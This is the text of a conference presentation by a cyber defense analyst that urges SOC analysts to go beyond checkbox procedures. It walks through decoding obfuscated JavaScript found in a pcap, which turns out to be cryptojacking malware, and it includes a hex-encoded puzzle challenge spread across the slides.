Following The BreadcrumbsPresented by: SSgt Samuel Kimmons

x56 x32

Before We Begin•All thoughts and opinions expressed by me during this presentation are my own and do not represent those of my employer.

x56 x32 x68 x68

$>whoami:Samuel Kimmons

Attribs:• Cyber Threat Emulator (Pentesting) & Air Force Cyberspace Defense Analyst (ACD-O)

• 33rd Network Warfare Squadron • Also known as: The Air Force Computer Emergency Response Team (AFCERT)

• GIAC Web Application Penetration Tester (GWAPT)• GIAC Certified Incident Handler (GCIH)• Pursuing a M.S. in Cyber Security at New York University (NYU)• In My Spare Time:

• Capture The Flag (CTF) Player• Python Scripter • Certification Collector

How To Contact Me?Official email: Samuel.Kimmons@us.af.milPersonal email: SamuelGKimmons@outlook.com@5pecial__K via Twitter

x56 x32 x68 x68 x64 x43

So What Does That Mean?

x56 x32 x68 x68 x64 x43 x42 x35

• I’m passionate about Cyber Security.• I love solving complex problems.• I attempt to look at situations a bit differently.• This stuff is just all around fun.

Let’s Jump Right In

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33

Imagine you’re an analyst starting your day:• You grab your coffee.• Get logged into the SIEM.• Throw on some headphones and get to work.

All of a sudden, alerts start firing!

What could it be?• An APT?• Malicious file execution?• Or maybe nothing at all?

Just Pick One!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67

What’s your organization’s policy?• First in the queue?• Severity level?• Or is it random?

For this scenario, let’s go with: Trojanware.

Trojanware: • Simply a program that’s doing something

that it isn’t supposed to be doing.

Event Selected: Nothing odd here?

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32

Seems like a no brainer investigation.

Just follow your procedural steps:• Check the pcap• Check the IPs/URLs• Run any hashes through Virus Total, Threatminer,

AlienVault, etc..

Maybe it’s an Internal to Internal IP, that means non-malicious right?

Why is the alert firing?

Mark It As Benign

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c

The alert fired on Trojanware, that’s probably because something conducted an out of the ordinary action.• All of the sensors / security devices gave you a thumbs up.• But what about that block of code in the pcap? Maybe the analyst thought it

was just apart of the session data?

At this point a lot of junior and some experienced analysts would close it out, and move.

Was The Analyst Wrong?

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47

Maybe nothing seemed truly odd or out of place. What they followed:

• Rinse and Repeat• Cut and Dry• Copy and Paste

Styles of Analysis, that they most likely follow for every investigation.

Is the Analyst to blame, or are the box checking styles of analysis the root cause?Maybe it’s the organization that’s locking them into these analytical methodologies?

These limiting analytical methodologies can be a plague upon Cyber Security Operations in an Organization.

So why do we lock our analysts into these procedural thinking methods? Shouldn’t we empower them to think differently?

Run It Again!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a

Let’s start over, but without the limiting factors of a checkbox methodology.

Empower the Analyst to think more freely, and approach each data point in a dynamic way.

Equip your Sherlock Holmes hat and get to it!

Let’s Try This Again

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47

Imagine that the first run through was pretty accurate.

The Analyst verified that none of the available data was malicious.Well not exactly..

Looks like a typical blob of data in a pcap…

Does it though?

Do you remember that snippet of code?

Moving BeyondTaking a step outside of the old methodology:• We can come to the conclusion that there is some level of encoding at play here.• Maybe:• Hex or Base64 encoding.

• Run it through some tools:• Base64 Decoder• Cyberchef• Etc.

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c

Now We’re CookingThe structure of the code starts to become apparent. Now remember this alert was most likely triggered from web traffic.Could it be some malicious script?

I think we’re on to something here!Hex encoding? The plot thickens!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d

Hex Be GoneUtilizing a tool to convert hex into plain text we can see what’s actually going on.

Tada!

What is the script doing?• We know it’s JavaScript.• We can see URLs.

What if we as the Analyst haven’t the faintest idea of what JavaScript can do?

Time to break out the ole Google-fu!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73

A Few Moments Later…

Boom!

Based on the code, it appears that the JavaScript file is attempting to redirect the user.

It may not have been obvious in the beginning but a certain level of obfuscation was being used in this script.

Obfuscation?What is obfuscation and how should we as Analysts approach it?

Obfuscation according to techtarget.com:

“Obfuscation is the practice of making something difficult to understand. Programming code is often obfuscated to protect intellectual property and prevent an attacker from reverse engineering a proprietary software.”

Like with every piece of technology developed for a good purpose, someone has probably weaponized it.

For example: • DNS used for Command and Control.• Interprotocol exploitation. • Etc. There are tons of examples.

Given enough time an Analyst could attempt to reverse engineer a piece of obfuscated code.

By not so simply following the breadcrumbs.Depending on the level of complexity, this may take some time. It is however possible!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68

The Initial Run Through

Investigation Part 1:• Straightforward.• Analyst had restrictive guidelines.• A simple methodology was used.

This type of approach operates along the lines of assuming the malicious actions will jump right out at them.

A simple analytical methodology may work some times.

That sure is putting faith in the tuning of your security devices.

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70

Final Run Through

Investigation Part 2:• Started the same way as the first run through.• The answer wasn’t blatantly obvious.• Had to apply a different methodology.• Followed the breadcrumbs, which led to our final result.

Stepping off point

Data Point

Spawned More

Questions

Data Analyzed

Analysis Driven Results

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31

Can You Follow The Breadcrumbs?It’s rare!

An advanced attacker will most likely not leave simple breadcrumbs behind.More specifically an APT!

The threats facing your organization:• Aren’t adhering to limiting guidelines.• Will try whatever possible to complete their objectives.

The adversary isn’t locking themselves into a procedural box.

So why should we?

Allowing our Analysts to think outside the box can greatly increase the odds of identifying nefarious actions.

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76

Putting The Puzzle Together

As Analysts or Investigators we’re often tasked with putting pieces of various types and amounts of data together to create an understandable picture of the events that led to an alert.

This can often be time consuming and require you to think a certain way.

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69

A Recipe For Disaster

An example that just so happens to involve breadcrumbs:• An alert fires for Trojanware

• A fellow Analyst asks for help.• Began to analyze:

• IPs / URLs = Checks out, nothing odd• Past events = Checks out, nothing odd

• In the pcap: some type of obfuscated code• Analyzed the code

• Base64 encoded• Decoded the JavaScript• Appears to also have URLs encoded in hex• After restoring the original data = Found to be CryptoJacking Malware!

Who would have ever thought as an Analyst you would be analyzing malware on a baking site hosting a breadcrumb recipe?

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69 x34 x3d

Endgame

What have we learned?• That we should approach every investigation in a dynamic manner.• Our methods should be adaptable to the information we have available to us.• There’s no way our security devices can detect everything!

• That’s where we as the Analysts come in.

• It is truly up to us to really drill down and determine if an event is malicious or simple noise in the SIEM.

Are you employing the correct analytical methodology?

The best methodology is the one that is fluid and can be implemented into every step of an investigation.

The Breadcrumb ChallengeSo did you follow the Breadcrumbs?

You may have noticed the hex on each slide.

Challenge:

The first individual to contact me with theanswer will get a copy of The Blue Team Field Manual.

Personal email: SamuelGKimmons@outlook.com@5pecial__K via Twitter

Two Underscores

Questions?Contact info:Official email: Samuel.Kimmons@us.af.milPersonal email: SamuelGKimmons@outlook.com@5pecial__K via Twitter